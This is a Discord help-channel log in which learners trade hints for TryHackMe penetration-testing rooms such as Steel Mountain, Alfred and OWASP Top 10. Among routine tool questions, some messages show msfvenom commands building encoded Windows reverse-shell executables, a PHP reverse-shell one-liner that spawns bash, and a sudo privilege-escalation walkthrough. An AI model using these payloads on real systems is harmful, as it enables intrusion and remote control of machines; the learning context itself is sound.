#room-hints

1 messages · Page 91 of 1

silver mica
#

Its a private room from my workplace to train

stuck fractal
#

Best not to ask about it here then

#

Because not only can we not help you, but usually those are meant to be completed individually

silver mica
#

Oh okay

#

I'll keep that in mind

distant tartan
#

hello
i am doing a room Hashing - Crypto 101
i am on task 3 question 2 i tried the hash in several website though i was not able to crack it some web site said the charset is not valid can i get a hint

silver otter
distant tartan
#

there

silver otter
#

that is online I would say

distant tartan
#

in the bee sec server right

silver otter
#

bot commands here, but you could also try hashes.com perhaps

#

not really sure how to give a hint about o.o

#

maybe open the first 10 links google gives you searching for hash cracking and put it into each ;D

green minnowBOT
#

Gave +1 Rep to @silver otter

hollow spindle
#

hello guys, i would like somebody to guide me

#

i am doing Rick`s CTF challenge

#

i found some information but, i stacked

white salmon
#

@hollow spindle Just type your question. What do you want to ask, where are you stuck at? Share some screenshots for better clarification.

hollow spindle
#

I found a Username, an /assets directory, open ports 22/80, and a sha256 code which i decoded with base64 and found a word "smow" (dont even know if its useful)

#

used the burp tool but couldnt find anything useful

white salmon
vital smelt
#

I'm working on "Upload Vulernabilities" task 11, file upload vulnerabilities.
I figured out how to bypass all of the client-side validation, but in order to do so, ||I had to prepend the node reverse shell script with ÿØÿ||. When I am able to access that, the response says that it could not be displayed because there are errors and I also don't ||get a connection with my nc listener||. Does anyone know if I'm missing something here?

vital smelt
#

nvm I think I figured it out 🙂

wooden bramble
#

A very useful option that should not be ignored:

How would you tell nmap to scan all ports?

#

Im stuck with that question

#

-p- solved

silver otter
#

nice one 😄

rustic surge
#

I'm kind of confused

silver mica
#

Hey, I am currently in the OWASP top 10 room at task 29, regarding the CSE Bookstore

#

So I used searchsploit and found three exploits

#

I could also login as admin using the Authentication bypass

#

but the question asks about characters in /etc/passwd

#

Now I am a bit stuck.. How would I be able to get there?

#

Maybe over an cross site scripting reverse shell using the first exploit listed when one searches for "cse bookstore"?

wooden bramble
#

--script=vuln

pure thistle
#

need hints for the ISO27001 room stuck at task3 question 1 what should i be researching for CETS No 185 could be a example of what? also stuck on task 5 question 2 What is the name of the "Operations security" i talking about an. any clear suggestions would be greatly appreciated

glacial gust
#

for task 3 q 1, look at the areas discussed in the topic and combine with a little Googling you should be able to find it

#

for task 5 q 2 look at the 3 types and see how it best fits

shadow patio
#

Need help with OSQUERY room: One of the users performed a 'Binary Padding' attack. What was the target file in the attack?

pure thistle
glacial gust
#

parts of the table

pure thistle
green minnowBOT
#

Gave +1 Rep to @glacial gust

glacial gust
#

np

jolly crescent
#

Hello fellow nerds

#

😁

#

Anyone there?

stuck fractal
#

Best to ask your question directly, then people can respond if they can answer

jolly crescent
#

I need help with "Relevant" room

stuck fractal
# jolly crescent I need help with "Relevant" room

That's not exactly directly.
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

  • What room you are on
  • At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
  • What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
mossy ermine
#

Hey guys. Could I have an hint on Coctus stories? I'm at the C.A.T. page

solemn onyx
#

Year of the fox: Got the rascal's credentials and logged into the site, but couldn't find a way to get lfi or the webflag... any hints?

#

I did tried to de-obfuscate js, but that didn't reveal much other than || a search.php with a post request in json format using the key 'target' ||

#

am I missing something?

#

Ok so I don't know how?? But when I typed in burp (out of frustration) "What to look for?" It returned 3 files?? Can anybody explain me this?

#

Any hints... On how to access those files?

short fox
mossy ermine
short fox
hexed island
#

Anyone managed to input the serv2 flag on Hacker101?

storm venture
#

@sudden shoal run showmount on the nfs share

#

make sure it's the /var directory

stuck fractal
#

@sudden shoal Run the VPN directly in Kali, not on the host OS.

sudden shoal
#

ahhhh

#

dumb mistake

#

thanks both of you

#

lol

sudden shoal
bold lichen
#

Guys i dont see payload encoding option

#

from task 9 of burp suit please do let me know

white salmon
bold lichen
#

but the payload encoding options isn't available

white salmon
#

@bold lichen

#

Go to Intruder -> Payloads, then at the very bottom you will find the option.

hidden rune
#

Hello everyone! I'm fairly new here and was hoping for some help on Network Services - Task 4. Maybe I've been on this too long and can't think of it, but how do I find the username of the account?

bold lichen
green minnowBOT
#

Gave +1 Rep to @halcyon sequoia

tight fulcrum
white salmon
hidden rune
hidden rune
green minnowBOT
#

Gave +1 Rep to @tight fulcrum

white salmon
#

Cool!

tight fulcrum
golden lotus
#

I am trying a burpsuite intruder attack on Juice Shop to bruteforce the admins password. It takes forever though, it seems wrong. Is it supposed to take ages?

prime willow
#

Only in the Community Version...

golden lotus
#

Okay so its supposed to be like that? Was thinking maybe i got something wrong

prime willow
#

Unfortunately, not necessarily

#

The community version is throttled

golden lotus
#

allright I'll just wait and see

prime willow
#

In the Juice Shop it should be possible to finish in this life 😉

golden lotus
#

thats nice encouragement!

prime willow
#

De nada. I do what I can..

smoky cape
#

Hello everyone
I want to ask that can we use linpeas or winpeas in oscp exam

astral smelt
minor pawn
#

how can I enumerate subdomains in nahamstore? I tried gobuster vhost, but it returns 200 for every subdomain in wordlist

stuck fractal
#

That's the right root word

short fox
slender dawn
#

something like this

#
ffuf -w subdomains.txt -u http://website.com/ -H “Host: FUZZ.website.com”
#

doing this you will get a lot of false results and then you need to filter it with -fw

#
ffuf -w subdomains.txt -u http://website.com/ -H “Host: FUZZ.website.com” -fw 349
candid nimbus
#

It's a word, based on the one you've already got that describes a protective layer, usually in a cable. Or another way of looking at it is think of that object as a verb rather than a thing.

craggy timber
ripe hedge
#

you pretty much have it

minor pawn
green minnowBOT
#

Gave +1 Rep to @short fox

slender dawn
#

np

green minnowBOT
#

Gave +1 Rep to @candid nimbus

#

Gave +1 Rep to @candid nimbus

ripe hedge
#

it's really silly once you get it

candid nimbus
ripe hedge
#

yes

#

but it's obvious to a native english speaker

#

a bit less so to non-native speakers

#

it's an object that verbs

#

.<

#

same concept really

silk wedge
#

Can anyone give me hint on recon nahamstore

versed galleon
#

hi

#

why i can't join voice

astral smelt
#

!docs verify

proud scarabBOT
abstract flicker
#

Hello I'm looking for a hint for Osquery room, Task 9, Question 2: "There is another security agent on the Windows Endpoint. What is the name of this agent?"
I've tried loads of different queries to different tables like win_services, win_event_log_data, osquery_registry, etc but cant for the life of me figure out what the answer is.

candid nimbus
quartz cargo
#

Hi all, I'm not sure if I'm overlooking the obvious or if it's just been a bit too long since I did the other rooms required to complete it, but I can't seem to find where to start in Investigating Windows 3. I've done the quick run throughs of event viewer, registry keys, even ran a quick scan, but just can't seem to find where to start. Can I get a hint on where to go first?

solid halo
#

room - yara
task10
1st que

gusty turtle
velvet anvil
#

I want to ask, I learned linux fundamentals first part. in task 9 why is there a shiba2 password even though I only created a nootnoot.txt file

stuck fractal
#

The binary is a program that checks that you created the text file

#

If you created the text file, it gives you the password when you run the binary

velvet anvil
stuck fractal
#

Just the machine for this room

ruby fulcrum
#

Hello all! I'm currently doing the Network Services room and I have successfully used mget to snag the id_rsa and id_rsa.pub files to the default/home directory in the AttackBox Machine but have been struggling to successfully move them into the /.ssh directory. I suspect I'm messing up the syntax on the "mv" command but I can't seem to figure out what I'm doing, any thoughts?

#

doing incorrectly*

stuck fractal
#

You don't need em in .ssh

#

You don't need the public key either

ruby fulcrum
#

hmm okay, I'll see what I can do with this new information, thanks!

white salmon
#

Hi all, anybody willing to give a nudge on the room "CmesS", did extensive enum, identified 2 possible exploits. Can't get them to work.

white salmon
#

Apparently not

quartz cargo
white salmon
#

'query' SQL Injection
Remote Code Execution (Unauthenticated)

#

Not sure if I can put spoilers here 😛 ?

stuck fractal
#

You can use spoiler tags in discord.
We'd prefer it if you didn't spoil things for no reason, but obviously if you're asking for a hint then you have to be able to tell us what you've tried/found etc

icy charm
#

Hey all.
I've a question regarding Alfred room. I'm trying to get a meterpreter shell for the room. but it is stuck here. Meterpreter session 1 opened (10.x.x.x:44 -> 10.10.46.188:49258) at 2021-05-11 23:59:31 +0530

icy charm
#

nevermind. I got the shell.
Thanks y'all.

white salmon
#

alright, well if you searchsploit the service there's only two exploits that make sense, and they are both based on a certain query language.

#

I tried both manual and changing those exploits but can't get them to work.

terse smelt
#

Hi guys? Room Steel Mountain: from msfconsole getting this:
Any ideas?

astral smelt
#

LHOST is incorrect

#

Needs to be your tun0 IP

stuck fractal
#

Also IDK why you redacted that

terse smelt
green minnowBOT
#

Gave +1 Rep to @astral smelt

muted trench
#

In Room HTTP in detail in Making Requests task. First flag which required Make a GET request to /room. In response when send a GET request to /room shows incorrect flag which wasn't accepted. There are missing 'E chars. (sorry for language wrongs)

muted trench
light ocean
#

Its written in the website itself still it says the answer is wrong

#

Room:MITRE

#

Task 7

remote gate
light ocean
#

ok thanks

#

I just had to replace them according to the chars shown

deft nacelle
#

currently struggling with osquery task 8 😦

deft nacelle
solid halo
#

What have you tried so far?
@gusty turtle yara 1ndex.php files/file2.yar

north dagger
#

What type of material can be used to go over the door to grab the secure side handles when an under the door tool is not able to be used?

#

can someone help me with this

gusty turtle
north dagger
#

Thank you so much!

gusty turtle
candid nimbus
deft nacelle
candid nimbus
deft nacelle
solid halo
candid nimbus
terse smelt
#

Hi guys. Steel Mountain room. Getting this:

C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9

[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.63.157
sc start AdvancedSystemCareService9
[-] Command shell session 2 is not valid and will be closed
[*] 10.10.63.157 - Command shell session 2 closed.
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

Any ideas?

#

Is it something with x86 payload/exploit ?

#

Tried this

msfvenom -p windows/shell_reverse_tcp LHOST=10.9.5.185 LPORT=4443 - e x86/shikata_ga_nai -f exe -o Advanced.exe
stuck fractal
#

try -f exe-service

#

Basically windows expects services to tell Windows that they started up properly otherwise it kills them.
-f exe-service generates a binary that tells windows it started up properly

terse smelt
#

nvmd solved it another way. Thanks

lone jackal
#

hi guys how can i get the windows privesc badge?

#

i have completed the windows privesc room but it doesn't give me the badge

tight fulcrum
lone jackal
#

thank you so much!

deft nacelle
quaint rune
#

Hey guys, Im new here

#

One question

#

I have no knowledge of this. Can I learn from the site?

slender dawn
#

there is a link to free path for beginners. You should read that

candid nimbus
deft nacelle
green minnowBOT
#

Gave +1 Rep to @candid nimbus

white salmon
#

Hi guys,

I'm in Alfred room and trying to create msfvenom payload.

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=<IP> LPORT=<port> -f exe -o reverseshellAlfred.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of exe file: 73802 bytes
Error: Input/output error @ io_write - reverseshellAlfred.exe

Do you know what this error mean?

#

Ok I created payload in mounted drive. When creating on local disk everything is fine.

lucid olive
#

Hi I'm in the Network services room, task 4. I have the id_rsa file and tried ssh -i id_rsa johncactus@IP but it just says Connection closed by IP port 22. Any hint of what I'm doing incorrectly would be appreciated.

stuck fractal
#

That's the wrong username

#

SSH will close the connection like that immediately if you have a valid key but a wrong username, usually.

lucid olive
#

Ah thanks

quartz cargo
#

Hi all, I'm in Investigating Windows 3.x. Can someone give me a hint for "This is the default communication profile the agent used to connect to the attack machine. What attack framework was used? What is the name of the variable?"

I read the forum post hints, but am still stuck. I have attack framework and I think I know variable but I'm not getting the correct answer

Edit I got the answer, it doesn't match at all with character length. Thanks!

sweet ferry
#

I am doing dogcat room and i have got root and got the 3rd flag which was in root directory

#

There is also a 4th flag but i have no hint for it

#

I tried finding it using find command but couldn't find it

smoky hare
#

dogcat is hard

sweet ferry
#

I have root shell rn

#

It doesn't evem have hint for 4th flag

glacial badge
#

How can I find the CIDR range of IP address having "172.16.x.x" and a Netmask of "255.255.0.0"?

#

I read a bit about Netmask and I understand the usage for it but not how to calculate it...

stuck fractal
#

The CIDR notation is network ip/prefix size

#

The prefix size tells you how many bits belong to the Network part rather than the host part

#

So like, 192.168.0.0/24 would be 192.168.0.x with a netmask of 255.255.255.0

glacial badge
#

How do I get that by my self?

stuck fractal
glacial badge
#

I'll try to read that for a sec.

#

I understood the concept of dividing networks, but I still didn't get how to calculate it by myself, I found a calculator for it online which satisfaies it for now... but I still want to understand it... if any of you can, it would be great if you can explain...

stuck fractal
#

Ok, so an IP address can be split into two parts

#

There's the host part and the network part. Not in that order, annoyingly

#

The network part is the same for all hosts on the network, the host part is what changes

#

For slash notation, the number tells you the number of bits for the network part.

#

The subnet mask is a 1 for each bit that belongs to the network part rather than the host part. It helps you write the addresses out in binary here.

worn otter
#

The way I learned it/like to think of it: each octet is 8 bits/1 byte. So the entire address is 32 bits/4 bytes. The number after the / is how many bits are "reserved" for the network, starting from left to right. Anything to the right of that is allowed to change.

#

So a 192.168.0.0./24 means those first 24 bits (first three octets) much remain the same. The last 8 bits can change. And then the number of available addresses is 2^(32-n), where n is the number after the /

#

so a x.x.x.x/32 defines a single address: 2^(32-32) = 2^0 = 1

#

while a x.x.x.x/16 is 65536: 2^(32-16) = 2^16

#

If you're comfortable with binary, sometimes it makes more sense to look at it from that perspective. But it's also fairly simple to just calculate the number of addresses, and then your range is the first address specified, plus that number. Although I think there's a little bit of strangeness there I don't quite understand when it doesn't match on a nice/neat boundary.

#

(that's when the address specified isn't the "starting" address, and is within the actual block)

shrewd turret
#

@stuck fractal dosn't the CIDR notation represent the usable IP Addresses of a certain Network?

wintry remnant
#

There is anyone , who has completed Mitre room. A hint for the following question, will be much appreciate:
Task 6 ATT&CK® Emulation Plans

Examining APT29, what 2 tools were used to execute the first scenario?
What tool was used to execute the second scenario?
Where can you find step-by-step instructions to execute both scenarios? Task 7 ATT&CK® and Threat Intelligence Per the detection tip, what should you be detecting?
What platforms does this affect? All my answers seem to be wrong.

silk wharf
#

Hi guys, I'm stuck on Burp Suite - Sequencer Let Sequencer run and collect ~10,000 requests. Once it hits roughly that amount hit 'Pause' and then 'Analyze now': I've paused it but for some reason the analyze now button is still grey, not clickable. Any advice?

spare halo
#

hello everyone, i'm stuck on PrivEsc room task 4. It says that i have to edit the hashes of root user with my own created hashes (which i managed to create). However, i have no idea how to replace the hashes of the root with my new hashes. Does vi works? In need of some advice

tight fulcrum
spare halo
#

@tight fulcrum thanks for the suggestion. figured i missed the full stop at the end of the hashes which causing it to not works. Thanks for the help again 🙂

green minnowBOT
#

Gave +1 Rep to @tight fulcrum

bold lichen
#

guys i know i have cracked the hash but idk where the hash is

#

can someone help me

stuck fractal
#

The hash is in /home/kali/Desktop/hash1.txt

bold lichen
#

no

#

i mean the cracked of hash1.txt

bold lichen
stuck fractal
#

It was printed to the console, but you can also use --show

bold lichen
stuck fractal
#

Screenshots.

#

because if it's saying that, then you're doing it wrong

bold lichen
stuck fractal
#

--show is not a command in itself

#

you would use john hashfile --show
Replacing hashfile as appropriate.

bold lichen
tight fulcrum
#

run john <your hash file > --show that's what he's saying

stuck fractal
#

Without the angle brackets

bold lichen
#

see @stuck fractal and @tight fulcrum

stuck fractal
#

Remove all the other flags.

#

You will notice that the commands we said didn't have any of those other flags

bold lichen
#

oh yes

#

and i get this

thorn heart
#

Why are you trying to crack it again, in the screenshot you sent, it showed the password.

stuck fractal
#

They're trying to retrieve the hash from the pot file

bold lichen
thorn heart
#

Look under where it tells you it can abort the connection

stuck fractal
#

...connection?

#

There's no connection

#

Please don't post answers tho

bold lichen
#

sorry

green minnowBOT
#

Gave +1 Rep to @thorn heart

bold lichen
glacial badge
#

Can someone help me? I'm doing the room about nmap.
I need to perform an Xmas can on the first 999 ports of the target, and say how many or open or filtered. I wanted to do

sudo nmap -Pn -sX -p 1-999 <ip-address>

but for some reason I still get the answer 0... when it's supposed to be 999, and I don't get why

#

It's fine for me to send a screenshot containing the IP address of the machine?

glacial badge
#

okay now it doesn't give me the answer quickly it just "hangs" (probebly still in the proccess but in the answer that I ended up opening thinking I was a dumb dumb it tool 0.01s, and in mine i'm waiting for a few minutes now

pure thistle
vivid crow
#

Working on the OWASP Top 10 module and I'm stuck on task 7. >_>

#

I keep getting the main page when I try registering the " darren" username

stuck fractal
#

Don't include the quotes @vivid crow

vivid crow
#

I've tried both ways. First time without.

vivid crow
#

Never mind, I figured out where my hang up was.

pallid trellis
#

Any hint on how to get a foothold in VulnNet: Roasted?

shell salmon
#

hello i am doing skynet and i have found the ||smb password in the email|| but its not letting me into the ||share|| for some reason (i am making very sure i enter every character correctly since the string is weird)

#

ive tried using tools like medusa to bruteforce it with a wordlist of 1 on both user and password

#

just to make sure im not typing it incorrectly

#

and it says unknown error when i do it

#

nvm i figured it out please ignore

slim pewter
#

can you ls in LFI?

#

within the URL

vapid oriole
obsidian spindle
#

what should i do on "Task 1 Starting your machine"?

red arch
#

@rigid leaf the box wants you to upgrade it to a meterpreter shell

#

it has some stuff you need for the next questions

#

but iirc you should already be in one since its attached to the eternalblue exploit

stuck fractal
#

The exploit is used to deliver a payload. You can change what payload is delivered.

red arch
#

right

stuck fractal
#

There's no inherent connection between eternalblue and a meterpreter aside from meterpreter being the default payload here.

peak harness
#

Hey peeps, I am not able to figure out what type of encosing this is -> MJQXGZJTGIQGS4ZAON2XAZLSEBRW63LNN5XCA2LOEBBVIRRHOM======

#

It's not base 64

#

it's part of the room -> c4ptur3-th3-fl4g

#

I have solved rest all questions, but this one's irritating me.

#

Can anyone help?

red arch
#

@peak harness base64 is not the only encoding

#

look at other base

peak harness
#

yep i know, but I don't even know what exactly should I gogole

#

ok, i'll search for that.

red arch
#

I recommend using cyberchef

peak harness
#

it was base 32, thank for sharing this 🙂

red arch
#

👌

#

happy to help

pallid trellis
pallid trellis
#

Yes. But first, I used the list I created for enumeration. I used another tool. Related to the name of the box 'Roasted'

lucid olive
#

Hey, I'm working on OWASP Top 10, on task 11. I'm suppose to find a db file in /assets but there is just two scripts. Is there a different spot I'm suppose to look or am I just missing something?

pallid trellis
worn otter
lucid olive
vapid oriole
green minnowBOT
#

Gave +1 Rep to @pallid trellis

vapid oriole
worn otter
#

!docs verify

proud scarabBOT
ashen bloom
#

Hi, i'm working on OWASP Top 10's first box, and I cannot execute a php reverse shell for some reason, am I doing something wrong?

worn otter
#

Probably :). Let's figure out what

#

This is task5- command injection?

ashen bloom
#

Yes, it is

lucid olive
ashen bloom
#

the reverse shell i'm trying to use is this: php -r '$sock=fsockopen("MYPrivateIP",9001);exec("/bin/bash <&3 >&3 2>&3");

worn otter
#

Just so I'm understanding, creating a revshell here is not part of this task, right? You're doing extra?

ashen bloom
#

Yes, i'm trying to get root

worn otter
#

that might not even be possible for that box, I don't know.

ashen bloom
#

oh, that could be why

worn otter
#

General revshell debugging: make sure the ip is your tun0 IP, that you have a listener running on the correct port, that you're connected to the vpn, and that it's running in the kali vm and not the host OS, if you're using a vm.

#

For the specific shell command you wrote above, it's possible there's a problem there calling "php ..." within a php file. I don't know enough about php or the structure of those shells to know for sure

stuck fractal
#

I'd also try simpler rev shells first

pallid trellis
ashen bloom
worn otter
#

looks more like 2 is being redirected to 3

stuck fractal
#

Again, simpler rev shells first

pallid trellis
lucid olive
# lucid olive

Hey, I'm still stuck on this problem. Am I missing something obvious?

worn otter
#

I'm sorry, I thought that screenshot was associated with what gellert asked. Clearly running on too little sleep

#

Okay, so I think the issue you're having, WillSloan, is that you need to go to http://site.com/assets/ in the web browser

#

the screenshot you posted doesn't tell me what page you're actually on

lucid olive
#

Ah yep, thanks

worn otter
#

did that solve the issue?

lucid olive
#

Yes it did. Didn't realize you could just browse to the folder.

worn otter
#

sometimes you can, sometimes not. Depends

#

in this case, the web server was (mis)configured to allow that

stuck fractal
#

(Directory listing is often enabled by default)

tall fable
#

Hello everyone 🙂

#

need help in wireshark room... the ip i found does not match the answer format..

#

Am i wrong ? Thx 🙂

stuck fractal
#

It doesn't fit the format, so yes

#

Surely you want responses rather than requests?

tall fable
#

thx 😉

stoic flower
#

Anyone know the vmem size of the memory forensic room

#

It shows the size is unknown

red arch
#

yea idk how to answer this

#

there is no specific date other than 2020 on there

#

wait really wtf

#

wtf is that extra character in the end there for

#

x.x

#

I call bull on that

worn otter
#

I would google or wikipedia that

remote gate
#

Must be answer tolerance if it accepted 4. Answer should be 4.2

#

Network File System (NFS) is a distributed file system protocol originally developed by Sun Microsystems (Sun) in 1984, allowing a user on a client computer to access files over a computer network much like local storage is accessed. NFS, like many other protocols, builds on the Open Network Computing Remote Procedure Call (ONC RPC) system. NFS...

dry current
#

Hello ..... I need some instraction .. I searched on youtube and watched a lot videos on the topic but didn't understand how to solve the task........https://tryhackme.com/room/owasptop10 ............................. Task 16 Q: Where is falcon's SSH key located?... I copied the answer so that i can complete the task..... But What happed here ... How can i found Where is falcon's SSH key located? using xxe .... i used command "locate .ssh" insted of using file name but nothing happed I am a newbie.............Pls help me what payload i need to find out the .ssh file .... I am a n00b

worn otter
#

locate .ssh probably wouldn't work, for two reasons: locate might not be installed, and .ssh is a directory

#

try locate id_rsa maybe

#

but also- think about it this way:

  • We know the user's name (falcon)
  • We know all users on linux systems tend to have a similar directory structure
  • We know that ssh keys are typically stored in certain directories (...../.ssh/
    Combine those pieces of information to guide your search/guessing
green minnowBOT
#

Gave +1 Rep to @worn otter

worn otter
#

you're welcome 🙂

#

what ended up working?

peak cypress
#

Hi guys i got stuck in nmap task 12 second Question
so what should i do?

worn otter
#

link the room please. I haven't done that one in a long time

peak cypress
worn otter
#

just paste the url of the room here so I can find it easier 🙂

white salmon
#

Paste the link to the room here

peak cypress
#

ok

#

this the link please help

worn otter
#

what command have you tried?

#

@peak cypress I'll only be here for a few more minutes

peak cypress
#

i dont understand what a question is asking?

worn otter
#

which question?

peak cypress
#

read through this script what does it depends on?

worn otter
#

post a screenshot of the script

peak cypress
#

and the script is smb-os-discovery.nse

#

ok

worn otter
#

no, post a screenshot of the contents of the script

peak cypress
#

ok

worn otter
#

I think you are misunderstanding me

#

open the script in your favorite text editor, and read it

peak cypress
#

How can i see content in the terminal?

#

which command is used

worn otter
#

sublime (subl) is a nice text editor but is not installed on kali by default

#

nano should be

peak cypress
#

ok i have nano

#

can i open in gedit?

worn otter
#

if not, cat would work, but it might be a long file. you could use "more" or "less"

#

sure

#

any text editor

peak cypress
#

ok

worn otter
#

the file should be something like /usr/share/nmap/scripts/smb-os-discovery.nse

peak cypress
#

ok

peak cypress
green minnowBOT
#

Gave +1 Rep to @worn otter

worn otter
#

you're welcome 🙂

normal ermine
#

Hi #room-hints,

Does anyone understand the OWASP Juice Shop - Download a Backup File!

I've downloaded the .md file using the null terminator, though it's expecting an answer?!?

#

plus how do I post a screenshot?!?!

tight fulcrum
#

You have to verify. Follow these steps and you get permissions

#

!docs verify

proud scarabBOT
normal ermine
#

Thanks @tight fulcrum, I'm verify 👍

green minnowBOT
#

Gave +1 Rep to @tight fulcrum

normal ermine
#

Hi #room-hints I've downloaded the package.json.back using the following command and I see a JSON object file, though there's no THM flag. Furthermore, there's no question to support answer

Guidence anyone?

cold oracle
white salmon
#

"If you want to exploit a 2020 buffer overflow in the sudo program, which CVE would you use?"

I've scooped the Exploit Database. Couldn't find

stuck fractal
#

Google: "2020 sudo buffer overflow"

white salmon
#

Ouu

#

Okay

#

Thanks

stuck fractal
#

You can't give up after the first place you look

storm venture
#

should quite literally be the first one anyway ;)

stuck fractal
#

You need to keep looking and keep trying new searches

white salmon
#

Yelp again

#

In Linux fundamentals part 2

#

Putty and SSH

#

I already have Linux as my Main OS

stuck fractal
#

So you can use the command line SSH client

white salmon
#

Do I need to install Putty on my PC?

stuck fractal
#

No

white salmon
#

Then?

#

@stuck fractal

stuck fractal
white salmon
stuck fractal
#

Either as long as your own machine is connected to the VPN

white salmon
#

Nope

#

AttackBox is the way then

rose wren
#

Can I get a nudge on PE for Relevant Room?

white salmon
rose wren
#

gotcha cheers

cold oracle
#

@wise kiln where do u find user directorys

#

in which directory

wise kiln
#

evilshell

#

/etc/passwd doesnt work this command

#

why

#

it aske "

How many non-root/non-service/non-daemon users are there?"

stuck fractal
#

/etc/passwd is not a command

cold oracle
#

not a command

wise kiln
#

how to get those number?

stuck fractal
#

Count

wise kiln
#

that list of .. huge list

stuck fractal
#

Yeah, except only a few are not service accounts AND not daemons AND not root

stuck fractal
#

Not your bro.

#

And yes, I counted. Because counting to a number less than 10 is easy enough.

cold oracle
# wise kiln

hint - do u know a directory where u can see the users?

cold oracle
#

/home*

#

and try that once

wise kiln
cold oracle
#

nope

stuck fractal
#

Why don't you try it and see anyway?

wise kiln
#

i tried it

#

it doesnt work in evilshell

stuck fractal
#

Screenshots

#

Show us what you're doing

wise kiln
#

ok

foggy cliff
# wise kiln

to see better the response open view the page source

normal ermine
green minnowBOT
#

Gave +1 Rep to @cold oracle

normal ermine
#

+1 Rep @cold oracle

#

+1 Rep @worn otter

#

however this works 🙂

rustic sphinx
#

+rep <user>
@normal ermine

green minnowBOT
#

Gave +1 Rep to @normal ermine

worn otter
green minnowBOT
#

Gave +1 Rep to @normal ermine

wise kiln
#

What is the user's shell set as? what does this mean

worn otter
#

there is a file which shows what each user's shell is set to

#

you need to figure out what that file is, and look inside it

wise kiln
#

file where in my user account folder?

worn otter
#

google can help you find the name of that file 🙂

wise kiln
#

www-data❌33:33:www-data:/var/www:/usr/sbin/nologin

#

what does this mean?

#

www-data is my user id..right

stuck fractal
wise kiln
#

cause i use command whoami

#

it shows www-data

cold bison
#

Hi guys i started vulnversity room with nmap challenge and i have scanned my attackbox with nmap but it doesn't show any squid proxy and webserver

#

Should i scan some other ip? Or am I missing something? I browse some info about it in google and it should display the information in first nmap scanning with -sV flag which I tried, so my guess is I am just scanning wrong ip.

stuck fractal
#

Yeah, you need to scan the target machine

cold bison
#

Okay, yes now it is clear. Thank you.

wise kiln
#

usr/share/doc/*/copyright

#

what does that * mean?

worn otter
#

it's a wildcard, can mean anything/everything

sly granite
#

I performed a TCP SYN scan on the first 5000 ports of the target (10.10.75.164)-- there are no ports shown as open. The syntax I used was:

#

nmap -p 1-5000 -T4 -A -v -Pn 10.10.75.164

worn otter
#

I'm far from an nmap expert, but try -sC -sV. Double check to see if the -A overrides that.

sly granite
#

I'll try that thanks

worn otter
#

you're welcome

sly granite
#

nmap -sC <target> worked

worn otter
#

great 🙂

#

Some rooms can take a while to boot up all the services, also. Some as much as 5-10 mins

sly granite
#

that is probably what happened

rigid leaf
#

hii

#

i found the secret dir on the ccpentest room

#

but idk which extentions to use

#

how do you choose?

worn otter
#

I'm not sure if I've done that room, so I'd need more info

rigid leaf
#

well

#

let me give you a discription then

worn otter
#

link it. Which task? What have you tried?

rigid leaf
#

last task,number 24

#

i nmaped the room

#

found 2 services

#

apache web server and ssh

#

i checked the webserver

#

it was a default server

#

i gobusted the ip and found a /secret directory

#

the hint says you should use extentions on the secret directory

#

but idk which extentions to use

worn otter
#

try gobuster with a -x txt

rigid leaf
#

oh smart

#

how did you pick txt?

worn otter
#

🤷‍♂️

#

I'm just looking at my notes from that room

rigid leaf
#

you made notes??

worn otter
#

It might have been my first guess, there might have been something there that was a hint

#

I always make notes

#

sometimes they don't mean much when I come back to them, but I try to always make notes on rooms I do 🙂

rigid leaf
#

yo epic

#

i found a secret.txt

#

looks to be some kind of hash

#

let me go crack that brb

rose wren
#

Can I get a nudge on PE for host Relevant? atm, I'm trying to escalate via SeImpersonatePriviliges, but JuicyPotato won't allow me to run and the binary gets deleted afterwards.. Something to do with AV probably? I would appreciate a nudge

worn otter
rigid leaf
#

okayyy

#

i got into the systtem

#

i think i got to get into root

#

whats a good priv esc technique?

worn otter
#

you ssh'd in with ||n|| ?

rigid leaf
#

there is a lot,do i just pick any

rigid leaf
#

i cracked the hash

#

and it looked like a typical ssh creds

worn otter
#

try ||sudo -l||

#

but you can also look around as your current user. I think there's a user flag there

rigid leaf
#

i got the user flag

worn otter
#

ah ok

rigid leaf
#

oooo

#

it has root

#

and no password ;)

#

how do i exploit that

worn otter
#

super easy

rigid leaf
#

hold on

worn otter
#

you don't need to do that

#

what was the output of the command I hinted at a minute ago?

rigid leaf
#

root nopassword

#

in /bin/su

worn otter
#

what does that tell you?

rigid leaf
#

you dont need a password to super user to root?

worn otter
#

to switch user

#

su is switch user

rigid leaf
#

oh yeah

#

so

#

i just got to do

#

||su root||

#

no wait

#

that doesnt work

worn otter
#

getting warmer

#

the (root) means you can sudo it

rigid leaf
#

YE

#

I GOT THAT

#

IT CAME TO MIND

#

A SEC BEFORE YOU SAID THAT LOL

worn otter
#

and su without an arg will infer root

rigid leaf
#

bro i felt like i cheated though 😭

#

should have done my own googling

worn otter
#

true. But those were easy ones

#

I just coaxed a little

rigid leaf
#

yeah this is just the basics

#

maybe it should be less of a test rather more of a way to commit all this knowledge to memory

#

thank you so much bro i appreciate it

worn otter
#

you're welcome

#

and yeah, I strongly encourage you to take notes as you go

#

all of this stuff comes up over and over again, so having a quick way to search that will be invaluable

rigid leaf
#

just to get an idea

worn otter
#

I don't have them on this machine

rigid leaf
#

oh i see

worn otter
#

but basically, for THM rooms, I break it down by tasks, same as the rooms are, with big headers

rigid leaf
#

like a walkthrough?

worn otter
#

and then in each section, I paste in every command I run, and things I learn, my thoughts, outputs of commands, etc

rigid leaf
#

do you document everything you do?

#

oh brilliant

worn otter
#

every command I run that gets me somewhere, yes

#

sometimes not 100% of them. Like for example, I spnet 20 mins looking through directories earlier, didn't find anything interesting

#

so rather than paste 50 cd and ls and their outputs, I just wrote a note about it

rigid leaf
#

smart

#

markdown notes or physical,paper notes?

worn otter
#

cherrrytree

rigid leaf
#

ohhh nicee

worn otter
#

and then I also have separate folders/sections for things like privesc attacks, revshells, stabilizing shells, etc

rigid leaf
#

